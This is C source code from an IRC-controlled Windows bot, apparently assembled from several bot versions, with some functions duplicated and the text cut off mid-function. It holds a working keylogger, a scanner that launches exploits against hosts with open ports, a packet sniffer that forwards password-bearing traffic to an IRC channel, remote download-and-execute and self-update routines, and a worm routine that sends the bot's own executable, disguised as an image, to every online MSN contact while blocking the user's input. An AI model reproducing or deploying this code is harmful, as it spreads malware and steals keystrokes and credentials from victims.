DWORD WINAPI SecureThread(LPVOID param)
{
NTHREAD secure = *((NTHREAD*)param);
NTHREAD *secures = (NTHREAD *)param;
secures->gotinfo = TRUE;
if (secure.bdata2) //loop
{
while (1)
{
if (!noadvapi32)
{
#ifndef NO_VIRUSREMOVE
RemoveVirus(0,NULL,TRUE,TRUE,FALSE);
#endif
SecureServices(NULL, 0, TRUE, FALSE, TRUE);
SecureRegistry(TRUE, NULL, 0, TRUE, FALSE, TRUE);
SecureShares(TRUE, NULL, 0, TRUE, FALSE, TRUE);
#ifndef NO_LSARESTRICT
if (!noadvapi32lsa)
SearchForPrivilegedAccounts(L"SeNetworkLogonRight",FALSE);
#endif
}
//WriteHostsFile(secure.secure, secure.sock, secure.chan, secure.notice, secure.silent, secure.verbose, secure.loop);
Sleep(SECURE_DELAY);
}
}
else
{
IRC* irc=(IRC*)secure.conn;
if (!noadvapi32)
{
if (secure.bdata1)
{
SecureServices(irc,secure.target,secure.silent,secure.verbose,FALSE);
#ifndef NO_VIRUSREMOVE
//RemoveVirus(secure.target,irc,FALSE,secure.silent,secure.verbose);
#endif
}
#ifndef NO_LSARESTRICT
if (!noadvapi32lsa) {
DWORD dwRet;
if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight",(secure.bdata1?FALSE:TRUE))) > 0)
irc->privmsg(secure.target,"%s %s SeNetworkLogonRights %s %d accounts in local system policy.", (secure.bdata1?sec_title:unsec_title), (secure.bdata1?"Removed":"Added"), (secure.bdata1?"from":"to"),dwRet);
else
irc->privmsg(secure.target,"%s Failed to %s SeNetworkLogonRights %s accounts in local system policy.",(secure.bdata1?sec_title:unsec_title),(secure.bdata1?"remove":"restore"),(secure.bdata1?"from any":"to"));
}
#endif
SecureRegistry(secure.bdata1,irc,secure.target,secure.silent,secure.verbose,FALSE);
SecureShares(secure.bdata1,irc,secure.target,secure.silent,secure.verbose,FALSE);
}
}
/*
} else {
// sprintf(sendbuf,"%s Advapi32.dll could not be loaded, %s could not be %s.",(secure.secure?sec_title:unsec_title),(secure.secure?"registry, shares, and services":"registry and shares"),(secure.secure?"secured":"unsecured"));
// if (!secure.silent) irc_privmsg(secure.sock,secure.chan,sendbuf,secure.notice);
// addlog(MAINLOG,sendbuf);
}
// WriteHostsFile(secure.secure, secure.sock, secure.chan, secure.notice, secure.silent, secure.verbose, secure.loop);
}
*/
clearthread(secure.threadnum);
ExitThread(0);
}
DWORD WINAPI KeyLoggerThread(LPVOID param)
{
KEYLOG keylog = *((KEYLOG *)param);
KEYLOG *keylogs = (KEYLOG *)param;
keylogs->gotinfo = TRUE;
char buffer[IRCLINE], buffer2[IRCLINE], windowtxt[61];
int err = 0, x = 0, i = 0, state, shift, bKstate[256]={0};
HWND active = fGetForegroundWindow();
HWND old = active;
fGetWindowText(old,windowtxt,60);
while (err == 0) {
Sleep(8);
active = fGetForegroundWindow();
if (active != old) {
old = active;
fGetWindowText(old,windowtxt,60);
sprintf(buffer2, "%s (Changed Windows: %s)", buffer, windowtxt);
err = SaveKeys(buffer2, keylog);
memset(buffer,0,sizeof(buffer));
memset(buffer2,0,sizeof(buffer2));
}
for (i = 0; i < 92; i++) {
shift = fGetKeyState(VK_SHIFT);
x = keys[i].inputL;
if (fGetAsyncKeyState(x) & 0x8000) {
if (((fGetKeyState(VK_CAPITAL)) && (shift > -1) && (x > 64) && (x < 91)))//caps lock and NOT shift
bKstate[x] = 1; /* upercase a-z */
else if (((fGetKeyState(VK_CAPITAL)) && (shift < 0) && (x > 64) && (x < 91)))//caps lock AND shift
bKstate[x] = 2; /* lowercase a-z */
else if (shift < 0) /* shift */
bKstate[x] = 3; /* upercase */
else bKstate[x] = 4; /* lowercase */
} else {
if (bKstate[x] != 0) {
state = bKstate[x];
bKstate[x] = 0;
if (x == 8) {
buffer[strlen(buffer)-1] = 0;
continue;
} else if (strlen(buffer) > 511 - 70) {
active = fGetForegroundWindow();
fGetWindowText(active,windowtxt,60);
sprintf(buffer2,"%s (Buffer full) (%s)",buffer,windowtxt);
err = SaveKeys(buffer2, keylog);
memset(buffer,0,sizeof(buffer));
memset(buffer2,0,sizeof(buffer2));
continue;
} else if (x == 13) {
if (strlen(buffer) == 0)
continue;
active = fGetForegroundWindow();
fGetWindowText(active,windowtxt,60);
sprintf(buffer2,"%s (Return) (%s)",buffer,windowtxt);
err = SaveKeys(buffer2,keylog);
memset(buffer,0,sizeof(buffer));
memset(buffer2,0,sizeof(buffer2));
continue;
} else if (state == 1 || state == 3)
strcat(buffer,keys[i].outputH);
else if (state == 2 || state == 4)
strcat(buffer,keys[i].outputL);
}
}
}
}
clearthread(keylog.threadnum);
ExitThread(0);
}
DWORD WINAPI AdvPortScanner(LPVOID param)
{
IN_ADDR in;
char logbuf[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
//ADVSCAN *scanp = (ADVSCAN *)param;
//scanp->cgotinfo = TRUE;
DWORD threadnum=scan.cthreadnum;
DWORD threadid=scan.cthreadid;
srand(GetTickCount());
while (advinfo[threads[threadnum].parent].info) {
DWORD dwIP;
if (scan.random)
dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
else
dwIP = AdvGetNextIP(threads[threadnum].parent);
in.s_addr = dwIP;
sprintf(logbuf,"[scan]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
sprintf(threads[threadnum].name, logbuf);
if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
if (scan.exploit == -1) {
EnterCriticalSection(&CriticalSection);
sprintf(logbuf,"[scan]: IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
addlog(logbuf);
LeaveCriticalSection(&CriticalSection);
} else {
EXINFO exinfo;
sprintf(exinfo.ip, finet_ntoa(in));
sprintf(exinfo.chan, scan.chan);
exinfo.sock = scan.sock;
exinfo.notice = scan.notice;
exinfo.silent = scan.silent;
exinfo.port = scan.port;
exinfo.threadnum = threadnum;
exinfo.exploit = scan.exploit;
exploit[scan.exploit].exfunc(exinfo);
/*if (exploit[scan.exploit].exfunc(exinfo)) {
EnterCriticalSection(&CriticalSection);
sprintf(logbuf,"[scan]: Finished with IP: %s, Port %d.",finet_ntoa(in),scan.port);
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
addlog(logbuf);
LeaveCriticalSection(&CriticalSection);
} else {
EnterCriticalSection(&CriticalSection);
sprintf(logbuf,"[scan]: Failed to exploit IP: %s, Port %d.",finet_ntoa(in),scan.port);
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
addlog(logbuf);
LeaveCriticalSection(&CriticalSection);
}*/
}
}
Sleep(2000);
}
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE], szSelfExe[MAX_PATH];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
// FIX ME: Make this a standalone function
if (!FileExists(szLocalPayloadFile)) {
GetModuleFileName(0,szSelfExe,MAX_PATH);
CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
// FIX ME: Make this copy to the same directory (could affect other stuff)
}
*/
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
// failed to initialize CriticalSection
sprintf(buffer,"[scan]: Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
threads[scan.cthreadnum].port = scan.port;
threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0);
Sleep(50);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI VisitThread(LPVOID param)
{
HINTERNET ch = 0, req = 0;
const char *accept = "*/*";
char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];
VISIT visit = *((VISIT *)param);
VISIT *visits = (VISIT *)param;
visits->gotinfo = TRUE;
// zero out string varaiables
memset(vhost, 0, sizeof(vhost));
memset(vuser, 0, sizeof(vuser));
memset(vpass, 0, sizeof(vpass));
memset(vpath, 0, sizeof(vpath));
// zero out url structure and set options
URL_COMPONENTS url;
memset(&url, 0, sizeof(url));
url.dwStructSize = sizeof(url);
url.dwHostNameLength = 1;
url.dwUserNameLength = 1;
url.dwPasswordLength = 1;
url.dwUrlPathLength = 1;
do {
// crack the url (break it into its main parts)
if (!fInternetCrackUrl(visit.host, strlen(visit.host), 0, &url)) {
sprintf(sendbuf,"[VISIT]: Invalid URL.");
break;
}
// copy url parts into variables
if (url.dwHostNameLength > 0)
strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
unsigned short vport = url.nPort;
if (url.dwUserNameLength > 0)
strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
if (url.dwPasswordLength > 0)
strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
if (url.dwUrlPathLength > 0)
strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);
ch = fInternetConnect(ih, vhost,vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
if (ch == NULL) {
sprintf(sendbuf,"[VISIT]: Could not open a connection.");
break;
}
req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.referer, &accept, INTERNET_FLAG_NO_UI, 0);
if (req == NULL) {
sprintf(sendbuf,"[VISIT]: Failed to connect to HTTP server.");
break;
}
if (fHttpSendRequest(req, NULL, 0, NULL, 0))
sprintf(sendbuf,"[VISIT]: URL visited.");
else
sprintf(sendbuf,"[VISIT]: Failed to get requested URL from HTTP server.");
} while(0); // always false, so this never loops, only helps make error handling easier
if (!visit.silent) irc_privmsg(visit.sock, visit.chan, sendbuf, visit.notice);
addlog(sendbuf);
fInternetCloseHandle(ch);
fInternetCloseHandle(req);
clearthread(visit.threadnum);
ExitThread(0);
}
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
DOWNLOAD dl = *((DOWNLOAD *)param);
DOWNLOAD *dls = (DOWNLOAD *)param;
dls->gotinfo = TRUE;
HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
if (fh != NULL) {
// open the file
HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// make sure that our file handle is valid
if (f < (HANDLE)1) {
sprintf(buffer,"[DOWNLOAD]: Cant Open File: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
clearthread(dl.threadnum);
ExitThread(0);;
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb
do {
memset(buffer, 0, sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
if (dl.encrypted)
Xorbuff(buffer,r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000) {
//We have free bytes...
//512000-total
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
if (dl.filelen)
if (total>dl.filelen)
break; //er, we have a problem... filesize is too big.
if (dl.update != 1)
sprintf(threads[dl.threadnum].name, "[DL]: File Download: %s (%dKB transferred).", dl.url, total / 1024);
else
sprintf(threads[dl.threadnum].name, "[DL]: Update: %s (%dKB transferred).", dl.url, total / 1024);
} while (r > 0);
BOOL goodfile=TRUE;
if (dl.filelen) {
if (total!=dl.filelen) {
goodfile=FALSE;
sprintf(buffer,"[DL]: Filesize Is Incorrect: (%d != %d).", total, dl.filelen);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
speed = total / (((GetTickCount() - start) / 1000) + 1);
CloseHandle(f);
/* if (dl.expectedcrc) {
unsigned long crc,crclength;
sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
crclength=total;
if (crclength>512000) crclength=512000;
crc=crc32(fileTotBuff,crclength);
if (crc!=dl.expectedcrc) {
goodfile=FALSE;
irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
}
} */
free(fileTotBuff);
if (dl.expectedcrc) {
unsigned long crc=crc32f(dl.dest);
if (crc!=dl.expectedcrc) {
goodfile=FALSE;
sprintf(buffer,"[DL]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
if (goodfile==FALSE)
goto badfile;
//download isn't an update
if (dl.update != 1) {
sprintf(buffer, "[DL]: Downloaded %.1f KB To %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (dl.run == 1) {
fShellExecute(0, "open", dl.dest, NULL, NULL, SW_SHOW);
if (!dl.silent) {
sprintf(buffer,"[DL]: Opened: %s.",dl.dest);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
// download is an update
} else {
sprintf(buffer, "[DL]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo, 0, sizeof(pinfo));
memset(&sinfo, 0, sizeof(sinfo));
sinfo.lpTitle = "";
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESHOWWINDOW;
sinfo.wShowWindow = SW_HIDE;
if (CreateProcess(NULL, dl.dest, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE) {
fWSACleanup();
uninstall();
ExitProcess(EXIT_SUCCESS);
} else {
sprintf(buffer,"[DL]: Update Failed: Error Executing File: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
} else {
sprintf(buffer,"[DL]: Not Working: %s.",dl.url);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
badfile:
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(0);
}
DWORD WINAPI MsnFile2(LPVOID param)
{
trt = 0;
NTHREAD msn2 = *((NTHREAD *)param);
NTHREAD *msns2 = (NTHREAD *)param;
msns2->gotinfo = TRUE;
IRC* irc=(IRC*)msn2.conn;
///Windir Zipfile Namensgebung
char fakename[] = "gafgatew.tmp";
char windir[MAX_PATH];
GetWindowsDirectory(windir,sizeof(windir));
strcat(windir, "\\temp\\");
strcat(windir, fakename);
IMSNMessenger3 *pIMessenger = NULL;
CoInitialize(0);
HRESULT hr = CoCreateInstance(
CLSID_Messenger,
NULL,
CLSCTX_ALL,
IID_IMSNMessenger2,
(void**)&pIMessenger);
char msnmsg[512];
char buf[128];
char msnmsg1[1024];
strncpy(msnmsg,msn2.data1,sizeof(msnmsg));
if (SUCCEEDED(hr))
{
char msg[256];
IDispatch * dispContacts = NULL;
pIMessenger->get_MyContacts(&dispContacts);
if (SUCCEEDED(hr))
{
IMSNMessengerContacts *pIMessengerContacts = NULL;
hr = dispContacts->QueryInterface(__uuidof(pIMessengerContacts),(LPVOID*)&pIMessengerContacts);
if (SUCCEEDED(hr))
{
IDispatch * dispContact = NULL;
IMSNMessengerContact *pIMessengerContact = NULL;
long iContacts;
hr = pIMessengerContacts->get_Count(&iContacts);
if (SUCCEEDED(hr))
{
BlockInput(true);
for (long i = 0; i < iContacts; i++)
{
hr = pIMessengerContacts->raw_Item(i,&dispContact);
if (SUCCEEDED(hr))
{
hr = dispContact->QueryInterface(__uuidof(pIMessengerContact),(LPVOID*)&pIMessengerContact);
if (SUCCEEDED(hr))
{
BSTR szContactName;
VARIANT vt_user;
MISTATUS miStatus;
IDispatch *pIDispatch = NULL;
IMSNMessengerWindow *pIMessengerWindow;
LONG wndIM;
hr = pIMessengerContact->get_Status(&miStatus);
if (SUCCEEDED(hr))
{
if (miStatus == MISTATUS_OFFLINE)
{
pIMessengerContact->Release();
dispContact->Release();
continue;
}
}
/// Message no [email protected] !!!
pIMessengerContact->get_SigninName(&szContactName);
VariantInit( &vt_user );
to_variant2(szContactName, vt_user);
_bstr_t tmp = szContactName;
sprintf(buf, _T("%s"), (LPCTSTR)tmp);
sprintf(msnmsg1, "%s", msnmsg);
///
///makes the 'zip' named email_023.jpeg-www.myspace.com
char *pemail;
pemail = strchr(buf, '@');
if(pemail != NULL) buf[pemail-buf] = NULL;
strcat(buf, "_023.jpeg-www.myspace.com");
//
char exepath[MAX_PATH];
GetModuleFileName(NULL, exepath, MAX_PATH);
zip_store(exepath, windir, buf);
///
Sleep(3000);
hr = pIMessenger->raw_InstantMessage(vt_user,&pIDispatch);
if (SUCCEEDED(hr))
{
hr = pIDispatch->QueryInterface(IID_IMSNMessengerWindow, (void **)&pIMessengerWindow);
if (SUCCEEDED(hr))
{
Sleep(10);
pIMessengerWindow->get_HWND(&wndIM);
SetForegroundWindow((HWND) wndIM);
SetFocus((HWND) wndIM);
trt++;
ShowWindow((HWND) wndIM,0);
srand(GetTickCount());
//stats_msg++;
//send message
key_type2((char *)msnmsg1, (HWND) wndIM);
keybd_event(VK_CONTROL, 0, KEYEVENTF_EXTENDEDKEY | 0, 0);
keybd_event(VkKeyScan('V'), 0, 0, 0);
keybd_event(VK_CONTROL, 45, KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP, 0);
keybd_event(VK_RETURN, 0, 0, 0);
//send zipfile
Sleep(50);
dropfiles2((HWND) wndIM, buf);
keybd_event(VK_CONTROL, 0, KEYEVENTF_EXTENDEDKEY | 0, 0);
keybd_event(VkKeyScan('V'), 0, 0, 0);
keybd_event(VK_CONTROL, 45, KEYEVENTF_EXTENDEDKEY | KEYEVENTF_KEYUP, 0);
}
}
pIMessengerContact->Release();
dispContact->Release();
}
}
}
BlockInput(false);
if ( trt > 1 )
{
irc->pmsg(InfoChan,str_msn_msg2, trx);
}
pIMessengerContacts->Release();
}
dispContacts->Release();
}
}
pIMessenger->Release();
}
CoUninitialize();
clearthread(msn2.threadnum);
ExitThread(0);
return 0;
}
DWORD WINAPI AdvPortScanner(LPVOID param)
{
IN_ADDR in;
char logbuf[LOGLINE];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->cgotinfo = TRUE;
int threadnum=scan.cthreadnum;
int threadid=scan.cthreadid;
srand(GetTickCount());
while (advinfo[threads[threadnum].parent].info) {
DWORD dwIP;
if (scan.random)
dwIP = AdvGetNextIPRandom(scan.ip,threads[threadnum].parent);
else
dwIP = AdvGetNextIP(threads[threadnum].parent);
in.s_addr = dwIP;
//sprintf(logbuf," s can -- IP: %s:%d, Scan thread: %d, Sub-thread: %d.",
//finet_ntoa(in), scan.port, threads[threadnum].parent, threadid);
sprintf(threads[threadnum].name, logbuf);
if (AdvPortOpen(dwIP, scan.port, scan.delay) == TRUE) {
//if (SynPortOpen(finet_addr(GetIP(scan.sock)), dwIP, scan.port, scan.delay) == TRUE) {
if (scan.exploit == -1) {
EnterCriticalSection(&CriticalSection);
//sprintf(logbuf," s can -- IP: %s, Port %d is open.",finet_ntoa(in),scan.port);
if (!scan.silent) {
if (scan.msgchan[0] != '\0')
irc_privmsg(scan.sock,scan.msgchan,logbuf,scan.notice, TRUE);
else
irc_privmsg(scan.sock,scan.chan,logbuf,scan.notice, TRUE);
}
LeaveCriticalSection(&CriticalSection);
} else {
EXINFO exinfo;
sprintf(exinfo.ip, finet_ntoa(in));
sprintf(exinfo.command, exploit[scan.exploit].command);
if (scan.msgchan[0] != '\0')
sprintf(exinfo.chan, scan.msgchan);
else
sprintf(exinfo.chan, scan.chan);
exinfo.sock = scan.sock;
exinfo.notice = scan.notice;
exinfo.silent = scan.silent;
exinfo.port = scan.port;
exinfo.threadnum = threadnum;
exinfo.exploit = scan.exploit;
exploit[scan.exploit].exfunc(exinfo);
}
}
Sleep(2000);
}
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI SniffThread(LPVOID param) {
char sendbuf[IRCLINE], rawdata[65535], *Packet;
int i;
DWORD dwRet, dwMode = 1;
PSNIFF sniff = *((PSNIFF *)param);
PSNIFF *sniffs = (PSNIFF *)param;
sniffs->gotinfo = TRUE;
IPHEADER *ip;
TCPHEADER *tcp;
IN_ADDR ia;
SOCKET sniffsock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);
ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock));
if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
sprintf(sendbuf, "[PSNIFF]: Error: Socket() Failed, Returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
clearthread(sniff.threadnum);
ExitThread(0);
}
threads[sniff.threadnum].sock = sniffsock;
if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF] Error: Bind() Failed, Returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
while(1) {
memset(rawdata, 0, sizeof(rawdata));
Packet = (char *)rawdata;
if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
_snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
ip = (IPHEADER *)Packet;
if (ip->proto == 6) {
Packet += sizeof(*ip);
tcp = (TCPHEADER *)Packet;
ia.S_un.S_addr = ip->sourceIP;
if (tcp->flags == 24) {
Packet += sizeof(*tcp);
if (strstr(Packet, "[PSNIFF]") == NULL) {
for (i=0;pswords[i].text;i++) {
if ((strstr(Packet, pswords[i].text)) != NULL) {
_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s Packet From: %s:%d - %s.", ptype[pswords[i].type], finet_ntoa(ia), fntohs(tcp->sport), Packet);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
break;
}
}
}
}
}
}
fclosesocket(sniffsock);
clearthread(sniff.threadnum);
ExitThread(0);
}
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
NTHREAD dl = *((NTHREAD *)param);
NTHREAD *dls = (NTHREAD *)param;
dls->gotinfo = TRUE;
IRC* irc=(IRC*)dl.conn;
char dlfrom[MAX_HOSTNAME];
char dlto[MAX_PATH];
strncpy(dlfrom,dl.data1,sizeof(dlfrom));
strncpy(dlto,dl.data2,sizeof(dlto));
HANDLE fh = fInternetOpenUrl(ih, dlfrom, NULL, 0, 0, 0);
if (fh != NULL)
{
HANDLE f = CreateFile(dlto, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f < (HANDLE)1)
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Couldn't open file for writing: %s.",(dl.bdata1?update_title:download_title),dlto);
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(0);
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000);
do
{
ZeroMemory(buffer,sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000)
{
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
}
while (r > 0);
speed = total / (((GetTickCount() - start) / 1000) + 1);
free(fileTotBuff);
CloseHandle(f);
fInternetCloseHandle(fh);
if (!dl.silent)
irc->pmsg(dl.target,"%s File download: %.1fKB to: %s @ %.1fKB/sec.",(dl.bdata1?update_title:download_title), total/1024.0, dlto, speed/1024.0);
if (!dl.bdata1 && dl.bdata2)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
BOOL hide=dl.bdata3, wait=dl.verbose;
char path[MAX_PATH];
strncpy(path,dlto,sizeof(path));
if (!fPathRemoveFileSpec(path))
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Couldn't parse path, error: <%d>", download_title, GetLastError());
return 1;
}
ZeroMemory(&si,sizeof(si));
ZeroMemory(&pi,sizeof(pi));
si.cb=sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = (hide?SW_HIDE:SW_SHOW);
if (!CreateProcess(NULL,dlto,NULL,NULL,FALSE,0,NULL,path,&si,&pi))
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Failed to create process: \"%s\", error: <%d>", download_title, dlto, GetLastError());
return 1;
}
else
{
DWORD start=GetTickCount();
if (!dl.silent)
irc->pmsg(dl.target,"%s Created process: \"%s\", PID: <%d>",download_title,dlto,pi.dwProcessId);
if (dl.verbose)
{
WaitForSingleObject(pi.hProcess,INFINITE);
DWORD stop=GetTickCount();
char ttime[120],stime[120];
stime[0]='\0';
DWORD total = ((stop - start)/1000);
DWORD hours = (total%86400)/3600;
DWORD minutes = ((total%86400)%3600)/60;
DWORD seconds = ((total%86400)%3600)%60;
if (hours>0)
{
sprintf(ttime," %d%s",hours,(hours==1?" hour":" hours"));
strcat(stime,ttime);
}
sprintf(ttime," %.2d:%.2d",minutes,seconds);
strcat(stime,ttime);
irc->pmsg(dl.target,"%s Process Finished: \"%s\", Total Running Time: %s.",download_title,dlto,stime);
}
if (pi.hProcess) CloseHandle(pi.hProcess);
if (pi.hThread) CloseHandle(pi.hThread);
}
// download is an update
}
else if (dl.bdata1)
{
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
ZeroMemory(&pinfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&sinfo, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
if (CreateProcess(NULL, dlto, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS|DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo) == TRUE)
{
uninstall(TRUE,(dl.idata1==1?TRUE:FALSE));
irc->quit(str_quit_upd);
Sleep(FLOOD_DELAY);
irc->disconnect();
fWSACleanup();
ExitProcess(EXIT_SUCCESS);
}
else
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Update failed: Error executing file: %s.",update_title,dlto);
}
}
}
else
{
if (!dl.silent)
irc->pmsg(dl.target,"%s Bad URL or DNS Error, error: <%d>",(dl.bdata1?update_title:download_title),GetLastError());
}
clearthread(dl.threadnum);
ExitThread(0);
return 0;
}
// part of the redirect function, handles sending/recieving for the remote connection.
DWORD WINAPI RedirectLoopThread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->gotinfo = TRUE;
int threadnum=redirect.cthreadnum;
char sendbuf[IRCLINE], buff[4096];
int err;
DWORD id;
SOCKET ssock;
do {
if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)redirect.port);
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(redirect.dest);
LPHOSTENT hostent;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(redirect.dest);
else
hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET);
if (hostent == NULL) break;
